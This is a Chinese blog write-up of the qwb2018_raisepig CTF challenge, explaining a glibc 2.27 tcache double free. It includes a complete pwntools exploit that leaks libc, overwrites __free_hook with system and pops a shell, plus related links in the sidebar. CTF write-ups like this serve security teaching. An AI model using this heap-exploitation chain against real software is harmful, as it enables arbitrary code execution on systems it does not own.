linux_pwn(2)--double free&&qwb2018_raisepig

已于 2022-03-10 10:49:55 修改
阅读量1.2k 收藏 6
点赞数 3
分类专栏: linux_pwn 文章标签: 安全 linux
于 2022-03-05 15:30:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123294781
版权

文章目录

What is double free

double free顾名思义,两次释放,在ctf里面一般就是对同一个内存块释放了两次,其实这个跟之前的uaf产生的方式有点类似,都是需要满足指针没有被置NULL

ptr=malloc(0x10)
ptr2=malloc(0x10)
free(ptr)
free(ptr2)
free(ptr)

由于直接连续free两次系统会判断,这样中间插入一次free系统就不会检测出double free
补充一下,一般double free是打tcache,fastbin要有chunk size check,用tcache double free的时候不需要管这个chunk size判断,只要控制了tcache的fd指针,就可以任意地址写

pwn题

在ctf里面,一般uaf出题模式就是
在bss开辟了区域,保存了每个heap的地址,但是free之后没有清除
而这个时候如果产生double free我们就可以通过修改fd来让堆块malloc再一个指定的任意地址,达到任意地址写的效果

例题

qwb2018_raisepig
在这里插入图片描述
框架也是比较清晰的

add函数

不存在溢出,也是分配了两个chunk
在这里插入图片描述

show函数

会展示name和type可以用来泄露libc
在这里插入图片描述

delete函数

没有把bss里面的内容清空,产生double free
在这里插入图片描述
delete_add我没有用上,就不分析了

开始做题

准备框架

#! /usr/bin/python3
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcheronline

it = lambda: io.interactive()
ru = lambda x: io.recvuntil(x)
r = lambda x: io.recv(x)
rl = lambda: io.recvline()
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)


elf_path = "./raisepig_debug"
elf = ELF(elf_path)
context(arch=elf.arch, os="linux", log_level="debug")
if "debug" in elf_path:
    libc_path = elf.linker.decode().replace("ld", "./libc")
    libc = ELF(libc_path)
else:
    libc_path = ""


if len(sys.argv) > 1:
    remote_ip = "node4.buuoj.cn"
    remote_port = 26672
    io = remote(remote_ip, remote_port)
else:
    if libc_path != "":
        io = process(elf_path, env={"LD_PRELOAD": libc_path})
    else:
        io = process(elf_path)


def debug():
    gdbscript = """
        c
        x/20xg $rebase(0x202040)
    """
    gdb.attach(io, gdbscript=gdbscript)


def add(size: int, content: bytes, types: bytes):
    sa(b"choice : ", b"1")
    sla(b"Length of the name :", str(size).encode())
    sa(b"The name of pig :", content)
    sla(b"The type of the pig :", types)


def show():
    sa(b"choice : ", b"2")


# 没有清空指针
def free(index: int):
    sa(b"choice : ", b"3")
    sla(b"Which pig do you want to eat:", str(index).encode())

调试

首先大概创建几个块

add(0x10, b"a", b"b")
add(0x10, b"b", b"c")
debug()

中间那个0x1011是系统的,我们暂时不管
在这里插入图片描述
可以看到bss里面都指向了头部
在这里插入图片描述
在这里插入图片描述
头部保存了1(这个是题目这样出的,防止覆盖fd),指向data,还有type
数据chunk,就保存了name
在这里插入图片描述

泄露libc

如果不知道libc,无法覆盖free_hook
而要想泄露libc,就要从unsorted bin里面分配块,然后未清空的fd可以被泄露

add(0x90, b"a", b"b")
free(0)

在这里插入图片描述
这里要注意free只free data部门,不free头,由于libv是2.27所以引入了tcache,这里我们需要首先free 7个块,填满tcache

for i in range(7):
    add(0x80, b"0", b"0")
for i in range(7):
    free(i)

可以看到填了7个tcache
在这里插入图片描述

for i in range(7):
    add(0x80, b"0", b"0")
for i in range(7):
    free(i)
free(0)

再free一个可以看到进入了unsorted bin
在这里插入图片描述
下面再分配一个小一点的块,这个时候会从unosrted bin里面切割

for i in range(7):
    add(0x80, b"0", b"0")
for i in range(7):
    free(i)
free(0)
add(0x20, b"a", b"b")

此时如果show就可以结合偏移去泄露libc
在这里插入图片描述

for i in range(7):
    add(0x80, b"0", b"0")
for i in range(7):
    free(i)
free(0)
add(0x20, b"a", b"b")
show()
ru(b"Name[7] :")
libc_base = u64(ru(b"\n").strip().ljust(8, b"\0")) - 0x7FB4F4209C61 + 0x7FB4F3E1E000
free_hook_addr = libc_base + 0x3ED8E8
system_addr = libc_base + libc.sym["system"]

其实就是第一个减去的就是泄露出来的地址,然后第二个是vmmap里面libc最小的地址,这样就可以得到libc的地址(偏移太累了,这样明显),顺便算一下free_hook和system的地址

double free

add(0x10, b"8", b"8")#a
add(0x10, b"9", b"9")#b
add(0x10, b"10", b"10")#c
free(9)
free(8)
free(10)
free(8)

这样我们相当于是形成了
a->c->a
我们首先会malloc a
同时把a的fd改为任意地址
之后的结构变成
c->a->任意地址
然后再malloc
再malloc
再malloc就能得到我们的任意地址写
由于我们是先把fd取出来,再去写内容,所以第二次malloc a对我们没有影响

add(0x10, b"8", b"8")
add(0x10, b"9", b"9")
add(0x10, b"10", b"10")
free(9)
free(8)
free(10)
free(8)

add(0x10, p64(free_hook_addr), p64(0))

在这里插入图片描述

add(0x10, b"8", b"8")
add(0x10, b"9", b"9")
add(0x10, b"10", b"10")
free(9)
free(8)
free(10)
free(8)

add(0x10, p64(free_hook_addr), p64(0))
add(0x10,b"a",b"a")

在这里插入图片描述

add(0x10, b"8", b"8")
add(0x10, b"9", b"9")
add(0x10, b"10", b"10")
free(9)
free(8)
free(10)
free(8)

add(0x10, p64(free_hook_addr), p64(0))
add(0x10,b"a",b"a")
add(0x10,b"b",b"b")

在这里插入图片描述

这也解释了我为什么要添加一个无用的块,不然我现在malloc不出来
下面再malloc就可以实现任意地址写

add(0x10, b"8", b"8")
add(0x10, b"9", b"9")
add(0x10, b"10", b"10")
free(9)
free(8)
free(10)
free(8)

add(0x10, p64(free_hook_addr), p64(0))
add(0x10, b"a", b"a")
add(0x10, b"b", b"b")
add(0x10, p64(system_addr), p64(0))

在这里插入图片描述
最后我们再创建一个/bin/sh的块

add(0x10, b"8", b"8")
add(0x10, b"9", b"9")
add(0x10, b"10", b"10")
free(9)
free(8)
free(10)
free(8)

add(0x10, p64(free_hook_addr), p64(0))
add(0x10, b"a", b"a")
add(0x10, b"b", b"b")
add(0x10, p64(system_addr), p64(0))
add(0x10, b"/bin/sh\0", b"a")
show()

show是为了看清楚是第几块
下面打远程

exp

#! /usr/bin/python3
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcheronline

it = lambda: io.interactive()
ru = lambda x: io.recvuntil(x)
r = lambda x: io.recv(x)
rl = lambda: io.recvline()
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)


elf_path = "./raisepig_debug"
elf = ELF(elf_path)
context(arch=elf.arch, os="linux", log_level="debug")
if "debug" in elf_path:
    libc_path = elf.linker.decode().replace("ld", "./libc")
    libc = ELF(libc_path)
else:
    libc_path = ""


if len(sys.argv) > 1:
    remote_ip = "node4.buuoj.cn"
    remote_port = 26672
    io = remote(remote_ip, remote_port)
else:
    if libc_path != "":
        io = process(elf_path, env={"LD_PRELOAD": libc_path})
    else:
        io = process(elf_path)



def add(size: int, content: bytes, types: bytes):
    sa(b"choice : ", b"1")
    sla(b"Length of the name :", str(size).encode())
    sa(b"The name of pig :", content)
    sla(b"The type of the pig :", types)




def show():
    sa(b"choice : ", b"2")


def free(index: int):
    sa(b"choice : ", b"3")
    sla(b"Which pig do you want to eat:", str(index).encode())




for i in range(7):
    add(0x80, b"0", b"0")
for i in range(7):
    free(i)
free(0)
add(0x20, b"a", b"b")
show()
ru(b"Name[7] :")
libc_base = u64(ru(b"\n").strip().ljust(8, b"\0")) - 0x7FB4F4209C61 + 0x7FB4F3E1E000
free_hook_addr = libc_base + 0x3ED8E8
system_addr = libc_base + libc.sym["system"]

add(0x10, b"8", b"8")
add(0x10, b"9", b"9")
add(0x10, b"10", b"10")
free(9)
free(8)
free(10)
free(8)

add(0x10, p64(free_hook_addr), p64(0))
add(0x10, b"a", b"a")
add(0x10, b"b", b"b")
add(0x10, p64(system_addr), p64(0))
add(0x10, b"/bin/sh\0", b"a")
show()
free(15)
it()

在这里插入图片描述

总结

double free其实不太需要栈溢出,但他唯一需要的就是至少可以修改掉fd指针,但一般我们要填写数据,所以还是很容易被覆盖的

azraelxuemo
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
Double Free与不起眼的拷贝构造函数
RadiumTang的博客
07-11 985
1. 介绍 我们先从一段平常的代码说起 int main() { auto * p = new int [10]; delete [] p; return 0; } 申请一段空间,并释放,没有任何问题。 再看下面的代码 int main() { auto * p = new int [10]; delete [] p; delete [] p; return 0; } 这样就会出问题,这是一个runtime error,成为双释放(double f
堆学习——Double Free
qq_41560595的博客
03-10 879
Double Free,内容如其名,同一个内存块被释放两次。 示例代码 #include <stdio.h> #include <stdlib.h> #include <assert.h> int main() { fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n"); // 分配三个chunk:a、b、c。
Double Free浅析
热门推荐
这里没人
05-14 1万+
最近在研究一些堆上面的漏洞。然后某一天骑自行车在路上跑的时候我突然悟出了Double Free的真谛。 2333好像太中二了一点,我是根据堆溢出的利用方法启发,再结合linux中libc的源码。研究出了double free的利用方法。虽然有关double free的利用技巧已经不是一个秘密。不过好像很少有相关的中文的介绍,所以以一个初学者的角度来讲解一下double free漏洞的利用方法。 ...
Double free(hows2heap)
fanghuapyk的博客
04-23 1397
1.fastbin_dup fast bin fast bin主要是用来存放一些小的内存,使用fastbin可以提高小内存的分配效率,在默认情况下,对于SIZE_SZ为4B(32位)的平台,小于64B(字节)的chunk分配请求,和对于SIZE_SZ为8B(64位)的平台,小于128B的chunk分配请求首先会在fast bin中查找是否有所需大小的chunk存在,如果存在,就会直接返回内存资源,如果不存在,才会到其他bins中去查找。 fastbins 可以看成一个后进先出的栈,使用单链表来实现,通过 f
【二进制安全】堆漏洞:Double Free原理
Juruo@Security
08-01 1123
【二进制安全Double Free原理
关于double free的一点点思考
u010736228的专栏
06-17 4538
double free就是程序分配一块内存之后,经过使用将这块内存释放,但并没有将指向这块内存的所有指针抹零或回收,并在其他部分再次将指向同一块内存单元的指针交给内存分配器去进行释放操作。     经常看到类似 if (p) free(p); 的写法,目的是为了防止double free, 但是防止double free的关键不是在释放内存前判断指针是不是为空。     请看以下代码: #i
C++中的深拷贝与浅拷贝,double free问题
weixin_44767670的博客
02-05 1706
C++中的深拷贝与浅拷贝,double free问题 C++中新增了类的概念 构造函数 析构函数等也就伴随而来 在构造函数中有一类被称为“拷贝构造函数”,如使用不当,会导致coredump等较麻烦的问题。 先说一下浅拷贝和深拷贝: C++中默认构造函数主要有两类, 第一类是针对定义类对象的,定义类对象时,如果没有对应的构造函数,会默认调用一个函数体为空的无参构造函数,比较简单,本文不多赘述; 第二类是针对类对象初始化新类对象的,当用类对象初始化新的类对象时,如果没有对应的拷贝构造函数,会调用一个默认的拷贝构
double free
浅浅徘徊的博客
03-16 6520
漏洞原理 Double Free其实就是一种在free时利用伪造chunk并且欺骗操作系统,达到修改内存的目的。 基本知识点 先大概说下基本知识。 不管是在正在使用的还是释放的chunk,其数据结构是差不多一样的,差别在于prev_size、’fd’和’bk’,prev_size只有前一个chunk是free状态才会放置其大小,后两个只有当前chunk是free状态才会有,不然只会存放数...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWM-OUT.rar_PWN_out
09-19
原子 的PWN 输出,寄存器程序,完全寄存器操作,可以直接打开。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
browser_pwn:浏览器pwn,现在主要工作
03-22
browser_pwn 浏览器pwn,现在主要工作。 v8_pwn v8开发 jsc_pwn 对jsc的利用
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
nodejs-trabalhofinal_pwn:PWN的最终工作
04-22
最后的工作 课程:Full Stack Web开发 学科:使用Node.js进行Web编程 老师: :page_with_curl: 陈述 待办事项清单 SM Solutions雇用您来开发产品,您可以在其中添加多个列表和每个列表的任务。...
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过计算偏移量得到libc的基址,进而计算出system函数和/bin/sh字符串的地址。最后,通过构造ROP链来调用system函数,并将/bin/sh字符串作为参数传入,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [[BUUCTF]PWN——xdctf2015_pwn200](https://blog.csdn.net/mcmuyanga/article/details/109622553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [xdctf2015_pwn200](https://blog.csdn.net/weixin_44309300/article/details/130628776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值